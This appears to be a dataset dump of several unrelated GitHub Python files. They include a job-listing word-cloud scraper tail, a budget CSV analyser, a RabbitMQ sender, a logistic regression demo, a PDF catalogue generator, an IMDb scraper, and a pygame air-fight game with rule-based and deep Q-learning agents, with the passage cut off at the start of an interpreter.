str_line\n\n print(str_keyword)\n\n wordcloud = WordCloud(font_path='./font/PingFang.ttc',\n background_color=\"white\").generate(str_keyword)\n\n plt.imshow(wordcloud, interpolation='bilinear')\n plt.axis(\"off\")\n # plt.show()\n\n plt.savefig(os.getcwd() + self.targetDir +\n self.targetName+'_wordCloud-'+job+'_city-'+city+'.png')\n\n except IOError:\n print('Open File Error')\n\n except Exception as e:\n print(e.args)\n finally:\n print('createWordCloud Finish!')\n\n print('createWordCloud end')\n\n def setTime():\n pass\n\n\nif __name__ == '__main__':\n # 创建爬虫对象\n spider = MySpider()\n\n # 爬取职位url\n # spider.run()\n\n # 爬取职位细节,在这一步之前请先运行MySpider的run()方法\n # spider.run_getDetail()\n\n # 对职位细节进行数据清洗\n # spider.processData()\n\n # 根据职位keyword生成词云\n spider.createWordCloud()\n","repo_name":"Kingfish404/find-jobs-app","sub_path":"spider/Spider_liepin.py","file_name":"Spider_liepin.py","file_ext":"py","file_size_in_byte":10737,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"36"} +{"seq_id":"28654168798","text":"## PyBank\n\n# Create a Python script that analyzes the records to calculate each of the following:\n\n# Imports the dependencies to: create file paths across operating systems (os) and read from csv files (csv)\nimport os \nimport csv \n\n# Set the csv (read from) and text (write to) file paths using the os module (imported above)\ncsv_path = os.path.join('Resources/', 'budget_data.csv') \ntext_path = os.path.join('Analysis/\", \"budget_analysis.txt') \n\nfile_name = 'budget_data.csv'\n\n# Creates variables, and set initial values to zero (as integers), important to set variables before open/read or open/write\nnum_months = 0 \n# The total number of months included in the dataset\nnet_profit_loss = 0 \n# The net total amount of \"Profit/Losses\" over the entire period\navg_profit_loss = 0 \n# The average of the changes in \"Profit/Losses\" over the entire period\nmax_profit = 0 \n# The greatest increase in profits (date and amount) over the entire period\nmax_loss = 0 \n# The greatest decrease in losses (date and amount) over the entire period\n\nwith open(csv_path, 'r') as csvfile: # Opens and reads the file using the csv module\n # Initiates DictReader from csv module, and the ability to reference dictionary keys (i.e. \"Profit/Losses\")\n csv_reader = csv.DictReader(csvfile)\n # Reads each row of the dictionary\n for row in csv_reader: \n budget_row = int(row[\"Profit/Losses\"]) # Converts content of column to integer, example here: https://courses.cs.washington.edu/courses/cse140/13wi/csv-parsing.html\n net_profit_loss += int(row[\"Profit/Losses\"]) # If statement to compare each row until the largest numeric value is found, example for largest value found here: https://courses.cs.washington.edu/courses/cse140/13wi/csv-parsing.html\n if max_profit == 0 or max_profit < budget_row:\n max_profit = int(budget_row) # If statement to compare each row until the smallest numeric value is found, example (above) reversed for smallest value\n if max_loss == 0 or max_loss > budget_row:\n max_loss = int(budget_row) \n \n # Creates variable for counting the number of lines, minus the header row \n num_months = csv_reader.line_num - 1\n \n # Format the calculated values after loop, but before print\n avg_profit_loss = \"${:,.2f}\".format(net_profit_loss/num_months)\n net_profit_loss = \"${:,.2f}\".format(net_profit_loss)\n max_profit = \"${:,.2f}\".format(max_profit)\n max_loss = \"${:,.2f}\".format(max_loss)\n # Formatting with comma separators: https://www.kite.com/python/answers/how-to-add-commas-to-a-number-in-python\n # Formatting with two decimal points: https://www.kite.com/python/answers/how-to-print-a-float-with-two-decimal-places-in-python#:~:text=Use%20str.,float%20with%20two%20decimal%20places&text=format(number)%20with%20%22%7B,string%20to%20print%20the%20float.\n # Formatting with leading dollar sign: https://www.daniweb.com/programming/software-development/threads/463071/percentages-and-dollar-signs-in-output \n \n # Prints to terminal\n print(f\"CSV Path: {csv_path}\") \n print(f\"Analysis Path: {text_path}\")\n print(f\" \")\n print(f\"Budget Analysis of {file_name}\")\n print(f\"Number of Months: {num_months}\")\n print(f\"Net Profit/Loss: {net_profit_loss}\")\n print(f\"Average Profit/Loss: {avg_profit_loss}\")\n print(f\"Greatest Increase Profit/Loss: {max_profit}\")\n print(f\"Greatest Decrease Profit/Loss: {max_loss}\")\n\n# Opens output file, and writes to it (ref: Python Documentation here https://docs.python.org/3/library/csv.html#writer-objects\nwith open(text_path, \"w\", newline='') as csvfile: # Eliminate blank lines in output: https://stackoverflow.com/questions/3348460/csv-file-written-with-python-has-blank-lines-between-each-row\n # Used example included in csv.writer (i.e. spamwriter): https://docs.python.org/3/library/csv.html\n text_writer = csv.writer(csvfile, delimiter=' ', quotechar=' ', quoting=csv.QUOTE_MINIMAL)\n \n # Prints to the output.txt file\n text_writer.writerow(['Budget Analysis of',file_name]) \n text_writer.writerow(['Number of Months:',num_months])\n text_writer.writerow(['Net Profit/Loss:',net_profit_loss])\n text_writer.writerow(['Average Profit/Losses:',avg_profit_loss])\n text_writer.writerow(['Greatest Increase Profit/Loss:',max_profit])\n text_writer.writerow(['Greatest Decrease Profit/Loss:',max_loss])","repo_name":"dianewitt/03-python","sub_path":"PyBank/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1220696073","text":"#!/usr/bin/python \r\n# -*- coding: UTF-8 -*-\r\nimport pika \r\n\r\nconnection = pika.BlockingConnection(pika.ConnectionParameters(\r\n host='localhost'))\r\nchannel = connection.channel()\r\n\r\nchannel.queue_declare(queue='hello-queue', \r\n\t\t\t\t\t\t\t\t\t\t\tauto_delete=True)\r\n\r\nchannel.basic_publish(exchange='hello-exchange',\r\n routing_key='hola',\r\n body='Hello World!')\r\nprint(\" [x] Sent 'Hello World!'\")\r\nconnection.close()","repo_name":"notepi/laboratory","sub_path":"rabbitmq/python/send.py","file_name":"send.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"43016291219","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom sklearn.metrics import classification_report\nfrom sklearn import preprocessing\n# 数据是否需要标准化\nscale = False\n\n# 画图正常显示中文\nplt.rcParams['font.sans-serif'] = ['SimHei'] # 用来正常显示中文标签\nplt.rcParams['axes.unicode_minus'] = False # 用来正常显示负号\n\ndef sigmoid(x):\n return 1.0 / (1 + np.exp(-x))\n\ndef cost(xMat, yMat, ws):\n left = np.multiply(yMat, np.log(sigmoid(xMat * ws)))\n right = np.multiply(1 - yMat, np.log(1 - sigmoid(xMat * ws)))\n return np.sum(left + right) / -(len(xMat))\n\ndef gradAscent(xArr, yArr):\n if scale == True:\n xArr = preprocessing.scale(xArr)\n xMat = np.mat(xArr)\n yMat = np.mat(yArr)\n # 学习率\n lr = 0.001\n # 迭代次数\n epochs = 10000\n # 申明一个列表用来存储loss\n costList = []\n # 计算数据行列数\n # 行代表数据个数,列代表权值个数\n m, n = np.shape(xMat)\n # 初始化权值\n ws = np.mat(np.ones((n, 1)))\n\n for i in range(epochs + 1):\n # xMat和weights矩阵相乘\n h = sigmoid(xMat * ws)\n # 计算误差\n ws_grad = xMat.T * (h - yMat) / m\n ws = ws - lr * ws_grad\n\n if i % 50 == 0:\n costList.append(cost(xMat, yMat, ws))\n return ws, costList\n\ndef plot(x_data, y_data):\n x0 = []\n x1 = []\n y0 = []\n y1 = []\n # 切分不同类别的数据\n for i in range(len(x_data)):\n if y_data[i] == 0:\n x0.append(x_data[i, 0])\n y0.append(x_data[i, 1])\n else:\n x1.append(x_data[i, 0])\n y1.append(x_data[i, 1])\n\n # 画图\n scatter0 = plt.scatter(x0, y0, c='b', marker='o')\n scatter1 = plt.scatter(x1, y1, c='r', marker='x')\n # 画图例\n plt.title(\"训练数据集散点分布\")\n plt.xlabel(\"自变量:x0\")\n plt.ylabel(\"自变量:x1\")\n plt.legend(handles=[scatter0, scatter1], labels=['label0', 'label1'], loc='best')\n plt.savefig(\"LR_scatter.png\")\n # plt.show()\n\ndef plot_result(ws,x_data,y_data):\n # 画图决策边界\n plot(x_data,y_data)\n x_test = [[-4],[3]]\n y_test = (-ws[0] - x_test*ws[1])/ws[2]\n plt.plot(x_test, y_test, 'k')\n plt.savefig(\"LR_result.png\")\n plt.show()\n\ndef plot_loss(costList):\n # 画图 loss值的变化\n x = np.linspace(0, 10000, 201)\n plt.plot(x, costList, c='r')\n plt.title('Train')\n plt.xlabel('Epochs')\n plt.ylabel('Cost')\n plt.savefig(\"LR_Loss.png\")\n plt.show()\n\n# 预测\ndef predict(x_data, ws):\n if scale == True:\n x_data = preprocessing.scale(x_data)\n xMat = np.mat(x_data)\n ws = np.mat(ws)\n return [1 if x >= 0.5 else 0 for x in sigmoid(xMat*ws)]\n\ndef train():\n # 载入数据\n data = np.genfromtxt(\"LR-testSet.csv\", delimiter=\",\")\n x_data = data[:, :-1]\n y_data = data[:, -1]\n # 绘制散点图\n plot(x_data, y_data)\n # 数据处理,添加偏置项\n x_data = data[:, :-1]\n y_data = data[:, -1, np.newaxis]\n print(\"x_data的数据形状为���\", np.mat(x_data).shape)\n print(\"y_data的数据形状为:\", np.mat(y_data).shape)\n # 给样本添加偏置项\n X_data = np.concatenate((np.ones((100, 1)), x_data), axis=1)\n print(\"x_data添加偏执后X_data的数据形状为:\", X_data.shape)\n\n # 训练模型,得到权值和cost值的变化\n ws, costList = gradAscent(X_data, y_data)\n print(\"训练后得到的权值列表为:\", ws)\n\n print(\"保存决策边界结果图像\")\n plot_result(ws, x_data, y_data)\n\n predictions = predict(X_data, ws)\n print(classification_report(y_data, predictions))\n print(\"保存loss下降结果……\")\n plot_loss(costList)\n\nif __name__ == '__main__':\n train()\n\n\n","repo_name":"asong1997/TensorFlow_Learning","sub_path":"samples_nn/logistic_regression(2).py","file_name":"logistic_regression(2).py","file_ext":"py","file_size_in_byte":3749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"1524157561","text":"# Import Dependencies\nimport pandas as pd\nimport numpy as np\nfrom fpdf import FPDF\nimport unicodedata\n\n# Reading input files\n# Input_path = \"CatalogoNAC_02.xlsx\"\n# df = pd.read_excel(Input_path, sheet_name='Inventario')\n#print(df)\n\ntitle = 'Nacimientos'\n\nclass PDF(FPDF):\n def header(self):\n # Arial bold 15\n self.set_font('Arial','B',15)\n # Calculate width of title and position\n w = self.get_string_width(title) + 6\n self.set_x((210 - w) / 2)\n # Colors of frame, background and text\n self.set_draw_color(0, 80, 180) # Blue\n self.set_fill_color(255, 255, 255) # Yellow\n self.set_text_color(0, 0, 0) # Black\n # Thickness of frame (1 mm)\n self.set_line_width(1)\n # Title\n self.cell(w=w, h=9, txt=title, border=1, ln=1, align='C', fill=1)\n # Line break\n self.ln(10)\n\n def footer(self):\n # Position at 1.5 cm from bottom\n self.set_y(-15)\n # Arial italic 8\n self.set_font('Arial', 'I', 8)\n # Text color in gray\n self.set_text_color(128)\n # Page number\n self.cell(0, 10, 'Page ' + str(self.page_no()), 0, 0, 'C')\n\n def nacimiento_num(self, num):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Número: %d' % (num), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n \n def nacimiento_pais(self, pais):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'País: %s' % (pais), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_ciudad(self, ciudad):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Ciudad: %s' % (ciudad), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_descripcion(self, descripcion):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Descripción: %s' % (descripcion), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_material(self, material):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Material: %s' % (material), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n \n def nacimiento_regalo(self, regalo):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Regalo de: %s' % (regalo), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n \n def nacimiento_piezas(self, piezas):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Piezas: %s' % (piezas), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_year(self, year):\n # Arial 12\n self.set_font('Arial', '', 12)\n # Background color\n self.set_fill_color(200, 220, 255)\n # Title\n self.cell(0, 6, 'Año: %.0f' % (year), 0, 1, 'L', 1)\n # Line break\n self.ln(0)\n\n def nacimiento_image(self):\n self.ln(6)\n self.cell(0, 190,'', 1,1)\n self.ln(0) \n\n def print_nacimiento(self, num, pais, ciudad, descripcion, material, regalo, piezas, year):\n self.add_page()\n self.nacimiento_num(num)\n self.nacimiento_pais(pais)\n self.nacimiento_ciudad(ciudad)\n self.nacimiento_descripcion(descripcion)\n self.nacimiento_material(material)\n self.nacimiento_regalo(regalo)\n self.nacimiento_piezas(piezas)\n self.nacimiento_year(year)\n self.nacimiento_image()\n\n# Reading input files\nInput_path = \"CatalogoNAC.xlsx\"\ndf = pd.read_excel(Input_path, sheet_name='Inventario')\n\n# Creating variables\nnumber_s = pd.Series(df[\"Núm.\"])\ncountry_s = pd.Series(df[\"Pais\"])\ncity_s = pd.Series(df[\"Ciudad\"])\ndescription_s = pd.Series(df[\"Descripción\"])\nmaterial_s = pd.Series(df[\"Material\"])\ngift_s = pd.Series(df[\"Regalo de:\"])\npieces_s = pd.Series(df[\"Piezas\"])\nyear_s = pd.Series(df[\"Año\"])\n\n# PDF creation\npdf = PDF()\npdf.set_title(title)\n\n# Obtaining data\nfor n in range(number_s.size):\n #print(number_s.iloc[n])\n pdf.print_nacimiento(number_s.iloc[n], country_s.iloc[n], city_s.iloc[n], description_s.iloc[n], material_s.iloc[n], gift_s.iloc[n], pieces_s.iloc[n], year_s.iloc[n])\n\n# Exporting PDF\npdf.output('tuto3.pdf', 'F')\n\n","repo_name":"Rodoba96/excel2pdf","sub_path":"Test/NacimientoPDF.py","file_name":"NacimientoPDF.py","file_ext":"py","file_size_in_byte":4898,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"} +{"seq_id":"19771024675","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\ndef main():\r\n request_func()\r\n \r\n\r\ndef request_func():\r\n html = \"https://www.imdb.com/chart/moviemeter/?ref_=nv_mv_mpm\"\r\n request = requests.get(html)\r\n status = request.status_code\r\n print(\"Status: \",status)\r\n if status == 200:\r\n print(\"We've been contacted. The shredding process begins...\")\r\n parse_html(request)\r\n else:\r\n print(\"Connection failed.\")\r\n\r\ndef parse_html(url):\r\n header=[]\r\n imdb_rating= []\r\n years = []\r\n soup = BeautifulSoup(url.text,\"html.parser\")\r\n movies = soup.find('tbody', class_=\"lister-list\").find_all('tr')\r\n \r\n \r\n for movie in movies:\r\n title = movie.find('td' , class_=\"titleColumn\").a.text\r\n year = movie.find('td', class_=\"titleColumn\").span.text.strip('()')\r\n header.append(title)\r\n years.append(year)\r\n\r\n for i in range(0, len(header)):\r\n print(\"Name of the Movie: {} Year: {}\".format(header[i],years[i]))\r\n\r\n\r\nmain()","repo_name":"oykuss/programming-python","sub_path":"webScraping.py","file_name":"webScraping.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"36"} +{"seq_id":"30600951232","text":"# -*- coding:utf-8 -*-\n# __author__ = 'wsm'\nfrom pygame.locals import *\nfrom plane_sprite import *\nfrom collections import deque\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import Adam\nfrom keras import backend as K\nimport pygame\nimport numpy as np\n\nFRAME_PER_ACTION = 1\n\n\nclass PlaneGame(object):\n \"\"\"\n Game main class\n \"\"\"\n def __init__(self):\n # 创建游戏窗口\n # Create game windows\n self.screen = pygame.display.set_mode(SCREEN_RECT.size, HWSURFACE | DOUBLEBUF)\n pygame.display.set_caption(\"Air Fight with two types of AI\")\n\n # 设置时钟及其刷新频率\n # Set clock and its refresh frequency\n self.clock = pygame.time.Clock()\n self.clock.tick(FRAME_PRE_SEC)\n\n # 实时显示得分\n # Show the score instantly\n pygame.font.init()\n self.score = 0\n self.score_font = pygame.font.SysFont('arial', 16)\n\n # 调用私有方法,创建精灵和精灵组\n # Create sprites and sprite groups by private method\n self._create_sprites()\n\n # 设置定时器事件 - 创建敌机 2s,英雄发射子弹1.5ms, 敌机发射子弹3s\n # Set three events to appear on the event queue:\n # 1. create one enemy per 2s\n # 2. hero fires per 1.5s\n # 3. enemy fires per 3s\n pygame.time.set_timer(CREATE_ENEMY_EVENT, 2000)\n pygame.time.set_timer(HERO_FIRE_EVENT, 1500)\n pygame.time.set_timer(ENEMY_FIRE_EVENT, 3000)\n\n def _start_game(self):\n # 为了让窗口长时间显示,需要放到循环里\n # To display the windows constantly, we need to update the windows in a loop\n while True:\n \n self._event_handler()\n\n self._control()\n\n # 碰撞检测\n # Detect collision\n self._check_collide()\n\n # 更新/绘制精灵组\n # Update sprites on the display\n self._update_sprite()\n\n # 实时显示得分\n # Show the score instantly\n self.score_surface = self.score_font.render(u'score = %d' % self.score, True, (0, 0, 0))\n self.screen.blit(self.score_surface, (5, 5))\n\n # 更新显示\n pygame.display.update()\n\n def _create_sprites(self):\n\n # 创建游戏背景\n # Create background sprite\n bg1 = BackGround()\n bg2 = BackGround(True)\n self.back_group = pygame.sprite.Group(bg1, bg2)\n\n # 创建敌机精灵组\n # Create enemy sprite group\n self.enemy_group = pygame.sprite.Group()\n\n def _event_handler(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n self._game_over(self)\n\n elif event.type == CREATE_ENEMY_EVENT:\n # 敌机出场\n # Create one enemy\n enemy = Enemy()\n # This enemy fires\n enemy.fire()\n # Add this enemy to the enemy sprite group\n self.enemy_group.add(enemy)\n\n elif event.type == HERO_FIRE_EVENT:\n self.hero.fire()\n\n elif event.type == ENEMY_FIRE_EVENT:\n for one_enemy in self.enemy_group:\n one_enemy.fire()\n\n def _control(self):\n pass\n\n\n def _check_collide(self):\n # 1.英雄子弹摧毁敌机\n # 1. Hero's bullets destroy enemies\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n for enemy in enemies:\n self.score += 1\n\n # 2.敌机或者子弹撞毁英雄\n # 2. Hero is killed by enemies or enemies'bullets\n enemies_killers = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)\n bullets = 0\n for one_enemy in self.enemy_group:\n bullets += len(pygame.sprite.spritecollide(self.hero, one_enemy.enemy_bullet_group, False))\n\n # 判断列表有无内容\n # If there exist enemy or bullet which collide with Hero, the game is over\n if len(enemies_killers) > 0 or bullets > 0:\n # Destroy hero\n self.hero.kill()\n # Game over\n PlaneGame._game_over(self)\n\n def _update_sprite(self):\n self.back_group.update()\n self.back_group.draw(self.screen)\n\n self.enemy_group.update()\n self.enemy_group.draw(self.screen)\n\n # 所有敌机的子弹都要更新\n # All of bullets of each enemy need to be updated their location\n for one_enemy in self.enemy_group:\n one_enemy.enemy_bullet_group.update()\n one_enemy.enemy_bullet_group.draw(self.screen)\n\n self.hero_group.update()\n self.hero_group.draw(self.screen)\n\n self.hero.bullet_group.update()\n self.hero.bullet_group.draw(self.screen)\n\n @staticmethod\n def _game_over(self):\n pygame.quit()\n exit()\n\n\n# Real player class\nclass PlayerGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n self.hero = PlayerHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n def start_game(self):\n super()._start_game()\n \n def _control(self):\n # 使用键盘提供的方法获取键盘按键 - 按键元组\n # Get the press tuple from the keyboard\n pressed_key = pygame.key.get_pressed()\n\n # 判断元组对应的按键索引值 按下为1,否则为0\n # If the key is pressed, corresponding value in the press tuple is 1, otherwise is 0;\n # 速度=4个像素/每次刷新\n # speed = 4 px/update\n if pressed_key[pygame.K_RIGHT]:\n self.hero.xspeed = 4\n elif pressed_key[pygame.K_LEFT]:\n self.hero.xspeed = -4\n elif pressed_key[pygame.K_UP]:\n self.hero.yspeed = -4\n elif pressed_key[pygame.K_DOWN]:\n self.hero.yspeed = 4\n else:\n self.hero.xspeed = 0\n self.hero.yspeed = 0\n\n\n# Rule-based AI\n# Adapted from flock algorithm\nclass FlockGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n\n # Create Rule-based AI Hero\n self.hero = FlockHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n def start_game(self):\n super()._start_game()\n\n def _control(self):\n # 获得所有敌机产生的所有子弹\n # Get all the bullets produced by all the enemies\n all_bullets = pygame.sprite.Group()\n for enemy in self.enemy_group:\n all_bullets.add(enemy.enemy_bullet_group)\n\n # 英雄根据当前环境做出反应\n self.hero.my_update(self.enemy_group, all_bullets)\n\n\nclass DRLGame(PlaneGame):\n\n def __init__(self):\n super().__init__()\n # 计算量太大,将事件频率降低,画面会好一点\n # As model-training is time-consuming, it would better to decrease the event frequency\n pygame.time.set_timer(CREATE_ENEMY_EVENT, 2000)\n pygame.time.set_timer(HERO_FIRE_EVENT, 1000)\n pygame.time.set_timer(ENEMY_FIRE_EVENT, 3000)\n\n # AI agent has 4 states and 5 corresponding actions\n self.state_size = 4\n self.action_size = 5\n\n self.hero = DRLHero()\n self.hero_group = pygame.sprite.Group(self.hero)\n\n self.STATE_1 = numpy.array([1, 0, 0, 0]) # 上方有敌机 没有在危险区内的子弹 There exist enemies above Hero, but no dangerous bullets\n self.STATE_2 = numpy.array([0, 1, 0, 0]) # 上方有敌机,有在危险区内的子弹 There exist enemies above Hero, also dangerous bullets\n self.STATE_3 = numpy.array([0, 0, 1, 0]) # 上方无敌机,没有子弹 There exist no enemies above Hero, as well as no bullets\n self.STATE_4 = numpy.array([0, 0, 0, 1]) # 上方无子弹,但是敌机会击中英雄 There exist enemies that can collide with Hero\n\n # Training parameters\n\n self.OBSERVE = 3200 # timesteps to observe before training\n self.EXPLORE = 300000 # frames over which to anneal epsilon\n self.FINAL_EPSILON = 0.0001 # final value of epsilon\n self.INITIAL_EPSILON = 0.1 # starting value of epsilon\n self.FRAME_PER_ACTION = 1\n self.REPLAY_MEMORY = 50000\n self.EPISODES = 500000\n self.batch_size = 32\n self.gamma = 0.99 # decay rate of past observations\n self.learning_rate = 0.001\n\n \n def start_game(self):\n\n\n # super()._event_handler()\n # self.model = self.build_model()\n # # 训练模型\n # # Training the model by Q learning\n # self.train_network()\n\n #-----------------------------------------------------------------------\n # 模型训练好,用下面的代码\n # After getting the trained parameters, remove the comments\n # 下载训练好的模型的参数\n # Load the trained parameters\n self.model = self.build_model()\n self.model.load_weights(\"model.h5\")\n super()._start_game()\n\n\n def _control(self):\n # get the first state\n s_t = numpy.array([0, 0, 1, 0])\n\n # In keras, need to reshape\n s_t = np.reshape(s_t, [1, self.state_size])\n a_t = np.zeros([self.action_size])\n\n q = self.model.predict(s_t)\n max_Q = np.argmax(q)\n a_t[max_Q] = 1\n self.hero.my_update(a_t)\n\n\n def build_model(self):\n # Neural Net for Deep-Q learning Model\n model = Sequential()\n model.add(Dense(24, input_dim=self.state_size, activation='relu'))\n model.add(Dense(24, activation='relu'))\n model.add(Dense(self.action_size, activation='relu'))\n model.compile(loss='mse',\n optimizer=Adam(lr=self.learning_rate))\n\n print(\"We finish building the model\")\n return model\n\n def train_network(self):\n # store the previous observations in replay memory\n memory = deque()\n # get the first state by doing nothing\n do_nothing = np.zeros([self.action_size])\n s_t, r_0, terminal = self.step(do_nothing)\n # In keras, need to reshape\n s_t = np.reshape(s_t, [1, self.state_size])\n\n # start training\n epsilon = self.INITIAL_EPSILON\n t = 0\n\n for i in range(self.EPISODES):\n loss = 0\n Q_sa = 0\n action_index = 0\n r_t = 0\n a_t = np.zeros([self.action_size])\n #choose an action epsilon greedy\n if t % FRAME_PER_ACTION == 0:\n if random.random() <= epsilon:\n print(\"----------Random Action----------\")\n action_index = random.randrange(self.action_size)\n a_t[action_index] = 1\n else:\n q = self.model.predict(s_t)\n max_Q = np.argmax(q)\n action_index = max_Q\n a_t[max_Q] = 1\n\n # We reduced the epsilon gradually\n if epsilon > self.FINAL_EPSILON and t > self.OBSERVE:\n epsilon -= (self.INITIAL_EPSILON - self.FINAL_EPSILON) / self.EXPLORE\n #run the selected action and observed next state and reward\n s_t1, r_t, terminal = self.step(a_t)\n s_t1 = np.reshape(s_t, [1, self.state_size])\n\n memory.append((s_t, action_index, r_t, s_t1, terminal))\n if len(memory) > self.REPLAY_MEMORY:\n memory.popleft()\n\n # only train if down observing\n if t > self.OBSERVE:\n # sample a minibatch to train on\n minibatch = random.sample(memory, self.batch_size)\n\n # Now we do the experience replay\n state_t, action_t, reward_t, state_t1, terminal = zip(*minibatch)\n state_t = np.concatenate(state_t)\n state_t1 = np.concatenate(state_t1)\n targets = self.model.predict(state_t)\n Q_sa = self.model.predict(state_t1)\n targets[range(self.batch_size), action_t] = reward_t + self.gamma*np.max(Q_sa, axis=1)*np.invert(terminal)\n\n loss += self.model.train_on_batch(state_t, targets)\n\n s_t = s_t1\n t += 1\n\n # save progress every 1000 iterations\n if t % 1000 == 0:\n print(\"Save model\")\n self.model.save_weights(\"model.h5\", overwrite=True)\n # print info\n state = \"\"\n if t <= self.OBSERVE:\n state = \"observing\"\n elif t > self.OBSERVE and t <= self.OBSERVE + self.EXPLORE:\n state = \"exploring\"\n else:\n state = \"training\"\n\n print(\"TIMESTEP\", t, \"/ STATE\", state, \\\n \"/ EPSILON\", epsilon, \"/ ACTION\", action_index, \"/ REWARD\", r_t, \\\n \"/ Q_MAX \" , np.max(Q_sa), \"/ Loss \", loss)\n\n print(\"episode finished\")\n print(\"***********************************\")\n\n def step(self, action):\n super()._event_handler()\n pygame.display.update()\n\n self.hero.my_update(action)\n # 被击中的敌机从精灵组中删去\n # Delete the destroyed enemies from enemy sprite group\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n\n for enemy in enemies:\n self.score += 1\n\n # 更新精灵\n super()._update_sprite()\n\n # 显示得分\n # Show the score instantly\n self.score_surface = self.score_font.render(u'score = %d' % self.score, True, (0, 0, 0))\n self.screen.blit(self.score_surface, (5, 5))\n\n # 更新\n pygame.display.update()\n\n all_bullets = pygame.sprite.Group()\n for enemy in self.enemy_group:\n all_bullets.add(enemy.enemy_bullet_group)\n\n # 获得下一个状态\n # Get next state\n next_state = self.get_game_state(self.enemy_group, all_bullets)\n\n # 英雄是否被摧毁\n # If Hero is killed, terminal is TRUE; otherwise terminal is FALSE\n terminal = self.is_terminal()\n reward = 0\n\n # Hero kills enemies\n if self.is_kill():\n reward += 10\n # 英雄上方有敌机,并且没有在危险区域内的子弹\n if (next_state==self.STATE_1).all():\n reward += 5\n\n # 英雄上方有敌机,并且有在危险区域内的子弹\n elif (next_state==self.STATE_2).all():\n reward += -5\n\n # 英雄上方无敌机,并且没有在危险区域内的子弹\n elif (next_state==self.STATE_3).all():\n reward += 0\n\n # 英雄上方没有子弹,但是因为敌机的size比子弹小,存在敌机会击毁英雄的可能\n # Though there is no bullet above Hero, the enemy probably kills Hero because its smaller size than bullets\n # This is because the picture size of enemy is smaller than that of bullet\n elif (next_state==self.STATE_4).all():\n reward += -5\n\n # 英雄阵亡\n # Hero is dead\n elif terminal:\n reward += -10\n\n return next_state, reward, terminal\n\n def get_game_state(self, enemies, bullets):\n enemy_above = self.hero.enemy_above(enemies)\n bullet_above = self.hero.bullet_above(enemies, bullets)\n # 状态1:英雄上方有敌机无子弹\n # STATE_1\n if enemy_above == True and bullet_above == False:\n return self.STATE_1\n # 状态2:有敌机有子弹\n # STATE_2\n elif enemy_above == True and bullet_above == True:\n return self.STATE_2\n # 状态3:无敌机无子弹\n # STATE_3\n elif enemy_above == False and bullet_above == False:\n return self.STATE_3\n # 状态4: 没有英雄正对的敌机,但是该敌机会击毁英雄,因此可以看做是子弹\n # STATE_4\n elif enemy_above == False and bullet_above == True:\n return self.STATE_4\n\n def is_terminal(self):\n # 敌机或者子弹撞毁英雄\n # Hero is killed by enemies or enemies'bullets\n enemies_killers = pygame.sprite.spritecollide(self.hero, self.enemy_group, True)\n bullets = 0\n for one_enemy in self.enemy_group:\n bullets += len(pygame.sprite.spritecollide(self.hero, one_enemy.enemy_bullet_group, False))\n\n # 判断列表有无内容\n # If there exist enemy or bullet which collide with Hero, the game is over\n return True if len(enemies_killers) > 0 or bullets > 0 else False\n\n def is_kill(self):\n # Hero's bullets destroy enemies\n enemies = pygame.sprite.groupcollide(self.hero.bullet_group, self.enemy_group, True, True)\n return True if len(enemies) > 0 else False\n\n\n","repo_name":"simanw/Air-Fight-AI","sub_path":"PlaneGame.py","file_name":"PlaneGame.py","file_ext":"py","file_size_in_byte":16840,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"36"} +{"seq_id":"71818566504","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*- \n#----------------------------------------------------------------------------\n# Created By : Tadeáš Kachyňa, \n# Created Date: 19/04/2022\n# version ='1.0'\n# ---------------------------------------------------------------------------\n\"\"\" Implementation of interpret\"\"\" \n# ---------------------------------------------------------------------------\nfrom enum import IntEnum, Enum\nimport re, argparse, os, sys\nimport xml.etree.ElementTree as ET\n\n# dictionary with keys which represents number of arguments for each instruction which are displayed in the dictonary as values \n# this part is also implemented in parser / syntactic 